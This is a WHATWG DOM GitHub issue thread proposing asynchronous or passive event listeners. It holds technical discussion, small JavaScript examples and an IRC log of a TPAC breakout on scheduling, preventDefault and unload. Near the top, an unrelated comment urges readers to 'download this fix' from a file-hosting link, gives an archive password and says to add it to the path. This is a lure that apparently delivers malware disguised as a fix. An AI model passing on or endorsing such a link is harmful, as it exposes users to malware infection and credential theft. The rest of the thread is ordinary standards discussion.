### ISSUE TITLE
Proposal: asynchronous event listeners

### ISSUE THREAD

**Issue by domfarolino** [whatwg/dom#1308]
### What is the issue with the DOM Standard?

I've heard chatterings in a few different places about interest in asynchronous event listeners on the platform, so I figured I'd file a bug here for some more centralized discussion. **The problem**: When some action happens on the web platform that results in firing events, all event listeners for that event are immediately, right then & there on the spot, without regard to the priority of the listener relative to surrounding tasks. It's entirely possible that developers wish to know about/respond to some events at a much lower priority than other competing tasks at around the same time. Currently there is no way to signal to the platform, that an event listener should be invoked _asynchronously after_ the platform would ordinarily do so, saving the event listener's invocation for a less-busy/contentious time, in terms of task scheduling and execution.

Enabling this would let developers extend their existing task scheduling / prioritization logic to their event listeners as well. Something very rough along these lines can already be done today:

```js
button.addEventListener('click', e => {
  if (mustDefer) {
    setTimeout(realClickHandler, kTimeout);
    // or…
    requestAnimationFrame(realClickHandler);
  }
});
```

…but it's pretty limited. First, it still involves immediately invoking user script in response to the event, so we don't actually avoid a big part of that cost. The fact that the queueing / deferral logic is handled immediately in userland is a missed performance opportunity — perhaps a large one? Second, it's not all that ergonomic, and is perhaps harder to schedule the `readClickHandler` relative to _other userland tasks_ that follow a certain scheduling dynamic.

I wonder if there is an opportunity to integrate the [Prioritized Task Scheduling API](https://wicg.github.io/scheduling-apis/) here. One option would be doing something as simple as passing in a [task priority](https://developer.mozilla.org/en-US/docs/Web/API/Prioritized_Task_Scheduling_API#task_priorities) to `addEventListener()`:

```js
button.addEventListener('click', e => {
    // Do real stuff asynchronously…
    // e.preventDefault() does not work here❗
}, {priority: "user-visible"});
```

@chrishtr @mmocny @shaseley @mfreed7

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by WebReflection** [comment]
FYI I've proposed to expose `event.waitUntil` when a listener is asynchronous as there's previous work on that within a Service Worker `fetch` listener ... and that didn't go well.

[As possible workaround](https://github.com/WebReflection/coincident/blob/ee25e58e449170729e767d8cfef11dbf073632cd/src/window/events.js), we ended up polluting the `addEventListener` to make it possible to prevent the default (or stop propagation) wen a listener comes from a worker.

Basically if the options contains an `invoke` field which is a `stopPropagation` or `preventDefault` string, or an array with one or more methods to invoke, when the event triggers these methods are invoked.

This works well **only** if you know AOT you want to prevent that default or stop that (immediate) propagation. It cannot possibly work in any other scenario and it can't work conditionally neither (but that's an implementation detail/limitation).

**Comment by mmocny** [comment]
> I wonder if there is an opportunity to integrate the [Prioritized Task Scheduling API](https://wicg.github.io/scheduling-apis/) here. One option would be doing something as simple as passing in a [task priority](https://developer.mozilla.org/en-US/docs/Web/API/Prioritized_Task_Scheduling_API#task_priorities) to addEventListener():

I like it!

I think this implies that each unique priority would be dispatched as a distinct (macro)task, and that the scheduler could defer lower priority event listeners as needed, perhaps even after rAF.

Would all event listeners at the same given priority still be coalesced into the same task?  Or, if they are async now anyway, should they all be scheduled as if called with `scheduler.postTask()`?

---

> FYI I've proposed to expose event.waitUntil when a listener is asynchronous

Interesting! I've made this suggestion before as well, though I wonder if the use case I had in mind was the same as what you suggested?

I think that `waitUntil` could be one useful way to express a _lazy-loading controller_ for an event listener.  Increasingly frameworks today support lazy-loading controllers/listeners, but rely on synchronous event capture and then later on synthetic event replay, to do so.  This is inconvenient and lossy in many ways... though an ideal solution might need to be declarative.


(But, I don't quite see how `waitUntil` should help make the initial event dispatch async...)

**Comment by WebReflection** [comment]
> (But, I don't quite see how waitUntil should help make the initial event dispatch async...)

example code I had in mind:

```js
anything.addEventListener('name', (event) => {
  event.waitUntil(new Promise(async (res, rej) => {
    const thing = await (await fetch(permision)).text();
    if (thing === 'OK') {
      event.stopPropagation();
      event.preventDefault();
      return resolve();
    }
    reject();
  }));
});
```

This idea won't need any execution priority expectation, it would just flag that event as "*unresolved*" until whatever asynchronous thing needed to eventually keep going happens.

I hope this makes sense.

Original proposal + discussion: https://github.com/whatwg/html/issues/9540

**Comment by mmocny** [comment]
That makes total sense to me, and overlaps entirely with the "lazy-loaded event listener" use case I mentioned.  It's just slightly orthogonal to the original proposal here.

(Not to say that all the async use cases shouldn't be discussed together)

**Comment by mmocny** [comment]
Here is one short list of use cases for what "async events" might mean to folks, each with potentially different feature requests:

- "lazy loading controllers"
  - You don't have the code to attach to addEventListener loaded yet, but the UI is already presented and the user could already interact.
  - You want to delay any events from _starting to dispatch_, perhaps until some fetch / script finishes loading, or alternatively you just want a better mechanism to capture and replay the event later.
  - Note: once the event listener is loaded, it becomes a normal synchronous event listener.
  - Note: the declarative UI might have a declarative fallback (e.g. link click or form submit) but the imperative event might be "better" if allowed to load.  Perhaps a timeout decides when to dispatch the default action?

- "passive event dispatch"
  - This event listener needs to observe the event, but doesn't actually implement the core functionality of the event and doesn't need to be scheduled immediately and before next paint.
  - Already supported for various scroll events, and for specific features like Intersection Observer and some animation lifetime events, etc.
  - Easy to polyfill or workaround, as an opt-in, but might leave scheduling/performance opportunities on the table.
  - As a native feature, might be applied as a policy / intervention.  For example, constraining a third party script to only be allowed to register passive listeners.
  - Note: `{priority}` seems to me to imply "passive" yet gives even more control.

- "async effects which follow the sync event"
  - The use case @WebReflection lists.
  - Might still want to be able to `preventDefault` etc from the async., e.g. form validation which needs a network hop first.
  - Might want other web platform features, like performance event timing, to measure all the way to the end of async effects.
  - (Potentially?) has some overlap with AsyncContext / Task Attribution

- "document unload" use cases
  - Today you can easily block the _start_ of a navigation that would unload a document, but, once a document starts unloading there is a limited amount of time for script.
  - As a result, many scripts hook onto events and delay the default action (such as a link navigaton or form submit) from even starting, for fear of not having a change to observe the event at all when that event triggers document unload.
  - Perhaps we need a contract: This event listener is only passively attached to this event... but it should be "flushed" before unload.  (Reminder: these scripts are already blocking unload start, anyway)

- "document loading" use cases
  - Related to lazy-loading controllers but less fine grained.  We have `blocking=render` for first paint but we don't have a way to block all events on resources like script.
  - Very early interactions are racy, and the priority of event dispatch is unpredictably prioritized over async/defer scripts.

**Comment by WebReflection** [comment]
I don't know if this is useful extra use case or implementation detail, but:

> Perhaps a timeout decides when to dispatch the default action?

I have worked with SerialPort API and discovered the [transient activation](https://html.spec.whatwg.org/multipage/interaction.html#transient-activation) standard which already works well on Chrome/ium browsers (at least) and it has a [transient activation duration](https://html.spec.whatwg.org/multipage/interaction.html#transient-activation-duration) spec that might (maybe?) help this proposal forward.

**Comment by flackr** [comment]
> - "async effects which follow the sync event"
>
>    - Might still want to be able to preventDefault etc from the async., e.g. form validation which needs a network hop first.

Being able to arbitrarily delay (and as a result re-order) default actions could have pretty far reaching complexity and implications.

I suspect for security reasons we might need to have a limit on how long a default action could be delayed and still executed, this reminds me a bit some of the async user activation use cases and could be a better way to handle it (having a direct link from the event to the user-activation requiring API), though we likely still need to support the model we have today. @mustaqahmed

I think we'd have to look through the different default actions and figure out whether they make sense to be possible to be delayed. E.g. we probably don't want to delay the default action of `touchdown` starting a scroll, and preventing the touch from turning into compatibility gestures like click.

Similarly there may be groups of default actions which don't make sense to be re-ordered. E.g. delaying setting focus while still clicking on the element?

**Comment by esprehn** [comment]
I like the spirit of this, though I think you'd need to make the events uncancellable per the top comment and the default action happen in the past for this to not introduce a lot of engine complexity.

I think at least in Chrome input (ex. click) is aligned to the frame boundaries at "user-visible" priority because of how it flows through the compositor. Other events happen at animation frame timing ("user-blocking") too:

https://source.chromium.org/search?q=%22enqueueAnimationFrameEvent(%22

https://source.chromium.org/search?q=%22-%3EEnqueuePerFrameEvent(%22&sq=

So in most cases calling requestAnimationFrame from inside those events won't help except to try to batch work differently. 

If you spec that the browser always posts a fresh task even if you're already at the same priority that would move the click later in time.

I suspect the most expensive part of clicking is the hit test which you can't avoid, but maybe those 3 lines of script add up. I don't see any harm in letting folks request a postTask priority like Dominic is suggesting though.

**Comment by smaug----** [comment]
There are so many different ways to schedule things that handling all the options in a param of addEventListener might be tricky. (For example, how to schedule running during idle time but at least after timeout?) 
It is also a bit unclear how much having native support for async listener would help with anything, when doing it all in JS is easy.

**Comment by WebReflection** [comment]
It’s not possible to do it all in JS so I’ve no idea what latest comment added to this discussion at all.

**Comment by mmocny** [comment]
Please, keep things civil.

---

I have created a document to expand on the ideas in this thread: https://github.com/mmocny/proposal-async-event-listeners, to prepare for the discussion happening later today in a TPAC breakout session: https://www.w3.org/events/meetings/df616a60-8591-4f24-b305-aa0870aac1cb/

---

Some of the concerns with `preventDefault()` do not apply to the original proposal in this thread.  Hopefully we can create a separate forum for further discussion for the related problems that this proposal touched on.

To keep things focused, please, let's constrain this thread to the specific problem: "Lack of support for passive Event Listeners." and the specific suggestion to leverage [Prioritized Task Scheduling API](https://wicg.github.io/scheduling-apis/) options.

**Comment by mmocny** [comment]
> not possible to do it all in JS

I think that just capturing an event and re-scheduling it in a future task, is possible from JS, and @smaug---- argues that it offers more flexibility.

I tried to address this comment in the other doc I linked but will update this issue with a response after brainstorm.

**Comment by annevk** [comment]
As a reminder, the [Code of Conduct](https://whatwg.org/code-of-conduct) applies to this and every other WHATWG repository, as well as our Matrix channel and any meeting. Please familiarize yourself with it and if you have any questions feel free to reach out on [Chat](https://whatwg.org/chat).

**Comment by flackr** [comment]
This was discussed at the TPAC breakout discussion on 2024-09-25:

<details><summary>The full IRC log of that discussion</summary>
flackr: mmocny: this is a discussion around ideas for 5 areas worthy of discussing. The bulk of the conversation could be for the first proposal but I wanted to seed the rest <br>
noamh joined the room<br>
ayu joined the room<br>
flackr: mmocny: [reads from slide]<br>
aykut joined the room<br>
flackr: mmocny: There's a large lack of support for passive listeners. When some action happens, all event listeners are immediately dispatched<br>
flackr: mmocny: When I click button, the counter increases value and does some expensive work<br>
flackr: mmocny: My component isn't bad, something else is blocking the update<br>
smaug joined the room<br>
flackr: mmocny: Developers often wish to respond to events at some lower priority without blocking paint. There's currently no way to signal to the platform. There's many patterns (e.g. double raf) to try to do this<br>
mustaq joined the room<br>
flackr: mmocny: Many listeners don't need to do any work to implement the default action<br>
flackr: mmocny: common example, cookie consent dialogs have many things that follow the click, e.g. dialog disappears, records choice. There's a case study where one cookie response provider saw an improvement of ??% by doing this<br>
flackr: mmocny: another idea is passive events. click events only dispatch non-passively even if you add a passive listener today. But if you polyfill this, you can delay expensive work<br>
flackr: mmocny: Some differences, passive events can't preventDefault. It can be easy to polyfill, but relying on polyfills makes it less accessible and less used in practice. Native impls might have some opportunities to improve perf. We might also have an opportunity for interventions, e.g. some script is only allowed to listen passively<br>
flackr: mmocny: an extension is to pass a priority. Right now, the priority is implicitly very high but if the dev knows priority is low maybe the dev could tell the UA<br>
flackr: mmocny: some apis have noticed this and work around it, e.g. beforetoggle and toggle for popover<br>
nathan joined the room<br>
flackr: mmocny: beyond UI events, there are other apis like IntersectionObserver which are inherently async, perhaps others could be<br>
flackr: bas: why passive? why not async?<br>
flackr: mmocny: any name you want. I picked this because passive exists<br>
flackr: mmocny: this was a prior choice made for scrolling, to allow devs to declare they don't need to prevent the event<br>
flackr: dom: since it's more about the effect that caused the event, that's why passive was chosen whereas async is ambiguous (microtask)<br>
flackr: mmocny: there are risks with deferring work because of unloads. You could attach listeners for every link click, you could block navigation by adding expensive work on click<br>
flackr: mmocny: worse yet, it prevents the start of any network request, speculation rules address some of this, but the issue is that at any point you could prevent the nav from happening<br>
flackr: mmocny: a nice script might choose to yield or add a passive listener to avoid this<br>
flackr: mmocny: however, once you do this, if the document unloads there's a very limited time to run your script, the effect could get dropped<br>
flackr: mmocny: [shows demo of this]<br>
flackr: mmocny: we know from lots of people that tried to be nice and yield they saw a decreased reliability and went back to blocking the nav<br>
noamh left the room: Quit: noamh<br>
flackr: mmocny: maybe we need assurances that tasks are flushed before unload. If you task could already have blocked the nav, and you choose to yield, maybe we can ensure we run them before unload<br>
flackr: mmocny: there is a pattern, idleUntilUrgent, that does this using doc lifecycle events<br>
flackr: mmocny: scott presented an api which could possibly have something like runBeforeUnload<br>
flackr: dom: with idleUntilUrgent, are we guaranteeing the task will run? If the task takes forever or there's 200 tasks before it we want to guarantee it succeeds/<br>
flackr: mmocny: correct, these scripts are currently guaranteed to run, we'd like to give them a lesser guarantee but some assurance that we will try to run them<br>
flackr: mmocny: there are reasons to block click events that might still be there, but most could likely do the nice thing<br>
flackr: dom: is there any diff between please before unload and having event handler run immediately and schedule the action in the unload listener?<br>
flackr: mmocny: not sure, there are reasons we motivate people not to do things before unload, like prevents bfcache, this could also run before unload<br>
flackr: dom: so it's like please run when idle or at worst before unload<br>
flackr: mmocny: right, it lets you be low priority before unload, then guaranteeing<br>
flackr: mmocny: there is a desire to track a string of async events. some sites create concepts to track groups of work<br>
flackr: mmocny: support for passive events might add to this problem, you might have many actions arbitrarily scheduled<br>
flackr: mmocny: maybe we should support tracking completion of effect<br>
flackr: mmocny: developers have asked for this, state of event listener dispatch, etc<br>
flackr: mmocny: there's also a string of projects to track scheduled work, task attribution, aync ??<br>
flackr: mmocny: we could have a TaskController, Finalize Registry<br>
flackr: mmocny: some folks have asked for preventDefault support. Right now you have to decide in the synchronous event whether to preventDefault<br>
flackr: mmocny: this can be difficult, right now you have to preventDefault always and then recreate the default action<br>
flackr: mmocny: some libraries debounce all events, with the real listeners delayed by one anim frame<br>
flackr: mmocny: validation could require a network hop<br>
flackr: mmocny: [reads from slide]<br>
flackr: mmocny: one common thing, you click, await fetch, before updating events<br>
flackr: mmocny: document loading, there's a moment in time where the page is loaded and painted but not ready to receive input yet<br>
flackr: mmocny: we have blocking=render but we don't have blocking=interactions<br>
flackr: mmocny: it is very recommended that sites server render content without requiring scripts to run, but this means early renderings are without event listeners on many sites<br>
flackr: .. very common to wait for DOMContentLoaded which means whole body has finished<br>
flackr: .. module scripts are implicitly after this<br>
flackr: .. many developers report that early interactions seem to perform better, but it's doing nothing<br>
flackr: .. some workarounds, inline JS in the HTML, have a wrapper to capture and replay listeners later<br>
flackr: ... more recently, there's a clever use of forms where all actions are wrapped with a form. But when your page is loading if an event arrives we'll do the default thing and submit the form reloading the page. It would have been much faster to run the already loaded script<br>
flackr: .. maybe we shoudl be delaying event dispatch<br>
flackr: .. if your script that would register event listeners is ready maybe we should let it run and put it behind the event queue<br>
flackr: ... similar question, what about hit testing? we should capture before the layout shift<br>
flackr: .. 5. lazy listeners. There could be many targets on the page that are lazy in loading controllers or listeners<br>
tbondwilkinson joined the room<br>
flackr: .. we complain we're shipping too much JS, we incentivize being ready for event dispatch. Many sites rely on event capture and replay<br>
flackr: ... instead of creating a giant bundle, server render the page, get started preloading portions of page (at low priority)<br>
flackr: ... then when user does interact, switch to priority loading for that listener<br>
flackr: .. but you have to rely on event replaying<br>
flackr: .. this can be complicated, but it also breaks a lot of UA default features, preventDefault, user activation, accessiblity, etc<br>
flackr: .. Maybe addEventListener could support promises<br>
flackr: .. possibly following service worker event.waitUntil pattern<br>
flackr: .. nav api has event.intercept<br>
flackr: .. view transitions returns a promise, waits until resolved<br>
flackr: .. or what if onclick could have a URL or some pattern to know what to load<br>
flackr: q?<br>
* Zakim sees no one on the speaker queue<br>
noamr: q+<br>
* Zakim sees noamr on the speaker queue<br>
domfarolino joined the room<br>
flackr: noamr: about waitUntilUrgent, is this mostly common in listeners that are the reason for the notification. e.g. click link that is navigating, and you yield in there? Or is it a more general problem?<br>
flackr: bas: a save button could be the same thing<br>
flackr: noamr: right, if you save there's a low chance you're navigating<br>
flackr: bas: save and quit is common<br>
noamh joined the room<br>
flackr: mmocny: I think it is general, unique thing is when you're interacting with event that navigates you could have blocked it<br>
flackr: ack noamh <br>
* Zakim sees noamr on the speaker queue<br>
flackr:  noamh: we started working on fetchLater for last minute fetching on unload. Maybe we need to think about this more hollistically instead of pushing more arbitrary code towards unload<br>
flackr: s/noamh/noamr<br>
flackr: mmocny: FYI fechLater is an API that can fetch even after unloading. The two features would work really well together. E.g. you want to stuff the fetch payload eagerly, so that it is queued. It's the second part of the equation<br>
flackr: noamr: can the first part also be more general?<br>
guohuideng left the room: Quit: guohuideng<br>
flackr: mmocny: I'm motivated to solve this as lack of passive event listeners is significantly impacting web perf<br>
flackr: mmocny: and the hesitation to do so would be addressed, at least partially, by this<br>
flackr: noamr: one thing comes to mind, if we had passive listeners, and there is a nav starting. The nav starting would be a sign to run the listeners, or some, or multiple levels e.g. i don't care if it gets dropped<br>
flackr: noamr: something a bit more generic than last minute work for the scheduler<br>
flackr: bas: concrete example<br>
flackr: noamr: if you have an onclick that adds something to analytics. This click event won't affect input feedback in any way, doesn't need to be quick just needs to happen before unload. You also don't want to block navigation and make it slower<br>
flackr: bas: Maybe i misunderstood, but idleUntilUrgent also doesn't block<br>
flackr: noamr: right, you don't want it to block, but it should block commit<br>
flackr: mmocny: my undersatnding is we unload the doc but allow event loop to continue<br>
flackr: mmocny: there are certain features that stop working but not all. I don't know if you have to delay this or not, but right now page freezes and you continue to do things<br>
flackr: bas: wouldn't stuff stop working?<br>
flackr: mmocny: in my experimentation, we'll commit the nav, show the new doc, but in the background there's some amount of time to schedule tasks.<br>
flackr: bas: but those tasks might expect stuff to be around, like document<br>
flackr: noamh: how critical is it to have reliably running events low priority?<br>
flackr: mmocny: i believe the priority is distinct from desire to run before unload<br>
flackr: mmocny: when dev says it's okay to run on idle, it means user is not waiting<br>
flackr: bas: i agree, can we move away from idleBeforeUrgent which implies priority<br>
flackr: bas: run before unload is more obvious to me<br>
flackr: mmocny: maybe it's priority: eventually or priority: background *and* run before unload<br>
flackr: bas: that makes more sense to me<br>
flackr: mmocny: we could consider whether all tasks should be flushed. We could make it easier but we could choose to be more efficient<br>
flackr: noamh: i still want to challenge assumption. Do we really want to encourage building something that assumes tasks will block navigation or might run while nav is happening? It seems like the wrong guidance<br>
flackr: noamh: but ... there's no alternative for users, e.g. say they want to do a critical activity<br>
flackr: bas: save the doc?<br>
flackr: noamh: but that should be part of building a reliable application<br>
flackr: noamh: you might want a more persistent way of doing things, not necessarily execute JS but have some ?? you can store<br>
flackr: noamh: we can never guarantee<br>
flackr: bas: there's never a guarantee anyways<br>
flackr: noamh: exactly, developer needs to consider this<br>
flackr: bas: right, but the probability is very different<br>
flackr: bas: you develop your app on the assumption it won't crash, so you don't have to auto-save often, and good probability you don't lose stuff. If we can increase the odds that we can run before unload it helps<br>
flackr: dom: I'm all for using priority based vocab to refer to increasing the probability that your work will run<br>
flackr: dom: i'm not sure about unload. I'm worried we'll push lots of work towards unload<br>
flackr: dom: I'm worried we'll have apps be fast until they unload<br>
flackr: dom: I think we should talk about it in terms of priority. At what point in time can you tell the platform it is urgent to do your work rather than assuming the last point in time<br>
flackr: bas: like an idle timeout?<br>
flackr: mmocny: these are all great points. There's an implicit deadline that when you run code that blocks the user interaction there's an implicit frustration. We're moving this to the background<br>
flackr: mmocny: I understand the concern, it is about signaling some assurance / making the patterns easier. The alternatives are yield and hope for best, but folks choose not to do this today<br>
flackr: mmocny: alternately you can guarantee it runs and reduce perf, and folks choose to do this<br>
flackr: mmocny: they are incentivized to do the bad thing<br>
flackr: bas: I'd like to understand concern, what if we accumulate huge amount of things, why would that happen?<br>
flackr: dom: probably lots of tasks would happen, but more would accumulate right before unload than would today<br>
flackr: Scott: we are encouraging putting things in pagehide, but yes does making it easier become dangerous?<br>
flackr: mmocny: maybe unload is wrong, e.g. resource contention, time limit may not be enough. Maybe this is high priority work. It's not supposed to block the interaction, but maybe it's eagerly flushed<br>
flackr: noamr: I see this work as after input feedback before navigation response. It doesn't have to block nav start, etc<br>
flackr: bas: there's multiple use cases<br>
flackr: * everyone agrees lower than feedback<br>
flackr: ??: i've looked at numbers, the unload event typically fires around the same as response time. we're not blocking navigation start<br>
flackr: mmocny: right, you can do this already<br>
flackr: philip: another scary situation, when doc starts unloading before it completes loading. We want to collect information. Do we want to make sure the nav still gets blocked?<br>
flackr: mmocny: I see some folks deploying large apps in room, which are serious problems as opposed to problems that you've solved and are fine<br>
flackr: mmocny: personally, I see it all the time<br>
flackr: bas: is it possible frameworks frequently hide this from people?<br>
flackr: mmocny: how?<br>
flackr: bas: don't know<br>
flackr: mmocny: stories i've heard is an ecommerce site invested in SSR, but it takes seconds for page to be interactive.<br>
flackr: mmocny: this can be busy loading script, or browser is optimizing first render and hasn't attempted to load script yet, event is immediately handled as a no-op<br>
tbondwilkinson: q+<br>
* Zakim sees noamr, tbondwilkinson on the speaker queue<br>
flackr: mmocny: this might trigger default action, but it doesn't do anything<br>
flackr: smaug: inert attribute, should you inert the html element?<br>
flackr: bas: but it blocks the interaction, doesn't store it<br>
flackr: smaug: but we can't replay it<br>
flackr: .. layout is different<br>
nathan left the room: Quit: nathan<br>
flackr: mmocny: my theory is this is already racy. When i interact, i send event to OS > browser > renderer > schedules, etc, it might not hit test for many frames, i hope there's no layout shift that changes target<br>
flackr: mmocny: I still think we should find the visible target<br>
flackr: mmocny: but we could do the same hit test we do today, capture the target immediately, but dispatch later<br>
flackr: mmocny: you might have a normal priority task which would have added the event listener<br>
flackr: smaug: of course you don't know the dependencies<br>
flackr: bas: the author can indicate it in this case<br>
flackr: smaug: the script might just be a tracking script. You just want to run the user input before the tracking script. It could be hard to figure out which scripts you want to load<br>
flackr: mmocny: right, that's a risk<br>
flackr: Ack noamr<br>
* Zakim sees tbondwilkinson on the speaker queue<br>
flackr: Ack tbondwilkinson <br>
* Zakim sees no one on the speaker queue<br>
noamh: q+<br>
* Zakim sees noamh on the speaker queue<br>
smaug: (we're running quite a bit overtime)<br>
flackr: tbondwilkinson: progressive hydration is pretty buggy. angular is working on it, others. That's one thing that may be interesting to focus on since frameworks are focusing on this. None of these seem like a complete dud. As a thought, how many frameworks use browser's event dispatch system?<br>
flackr: .. probably not many, because it's not a great system<br>
flackr: .. anything we can do to improve this would be great to encourage people to use the system<br>
Scott left the room: Quit: Scott<br>
domfarolino left the room: Quit: domfarolino<br>
noamr left the room: Quit: noamr<br>
noamh left the room<br>
aykut left the room: Quit: aykut<br>
flackr: mmocny: thanks for discussion. I've linked to all of this from the session<br>
</details>

**Comment by WebReflection** [comment]
I haven't seen updates after late September but there is one option that hasn't been discussed: the usage of `{ async: true }` as third argument field:

  * it can help disambiguating more than an async callback added as listener, because even a sync callback could return a *Promise*
  * it can easily fail down the path if other listeners were added without such option *but* ... if there is only one listener for that specific node (node ownership via library/FW/utility) it helps branching logic without affecting the rest, delaying eventually the bubbling, so that capturing could prevent those listeners to ever happen but if inner-node has one or more async listeners attached, it can decide when the rest of the bubbling could happen, if ever
  * there should be still a way to prevent events from never resolving, so that this behavior could be related to a MAX_LISTENER_TIME defined by vendors

Once upon a time, we had `click` events triggering after ~300ms because `ondblckick` event could've also happened in the meantime, these days that delay has been mitigated but I find that ~300ms a sweet spot that makes events more convoluted **only** if an explicit `{ async: true }` has been provided.

This idea is still about branching events in a way or another, but to me it feels like the least obtrusive approach:

  * fully backward compatible with all the Web that never used such property as optional third argument field
  * it doesn't change anything in those pages where such property never exists
  * it helps libraries' authors to define listeners on specific nodes which *asynchronicity* is crucial to better operate

Any thought about this option? Thanks.

**Comment by WebReflection** [comment]
> But again, the specific scope of this proposal here I think is limited to the "passive events" use case.

I am not sure when that became the case as the issue title is **Proposal: asynchronous event listeners** and the first presented example is a `click` event.

> Obviously we could create other proposals to handle the other use cases

What would be, after this one, a good title for those proposals?

> If we do both sync and async event dispatch that might mean more total tree walking.

I think async listeners should throw if attached as capturing, as that makes no-sense to me, just my 2c on that.

**Comment by krzksz** [comment]
After chatting with @mmocny, I'd like to reignite this discussion. I believe this API would be a significant enabler for optimising the Interaction To Next Paint metric.

One of the emerging techniques to do so is delaying the non-critical work until after the interaction is handled. This can have many flavours including:
- Yielding to the main thread using the [Scheduler.yield](https://developer.mozilla.org/en-US/docs/Web/API/Scheduler/yield).
- Deferring the work using the [`requestAnimationFrame(() => setTimeout(..., 0))`](https://web.dev/articles/optimize-inp#yield_to_allow_rendering_work_to_occur_sooner) combo or the [`postTask()` API](https://developer.mozilla.org/en-US/docs/Web/API/Scheduler/postTask).
- More robust patterns like [`yieldUnlessUrgent`.](https://kurtextrem.de/posts/improve-inp#exit-event-handlers-yieldunlessurgent)

There are many examples of use cases. The one we're seeing on Shopify the most is product swatches interactions:
1. User clicks on a swatch.
2. [Critical] UI updates to a different color or size and the gallery updates.
3. [Deferred] The URL is updated using the `history.replaceState()` to reflect the new variant ID.

Pretty much every single analytical script (e.g. GTM, Meta) proxies the `history.replaceState()` to listen to the URL updates. This makes it very expensive and causes bad INP unless we yield.

My hope is that providing a simple extension to the `addEventListener` that:
- fallbacks gracefully to a standard listener for older browsers,
- retains the `event.target` reference even if the node is removed from the DOM (already the case for standard listeners),
- guarantees execution before document unloads,
would allow both 1st and 3rd party developers to defer their work after the interaction more easily.
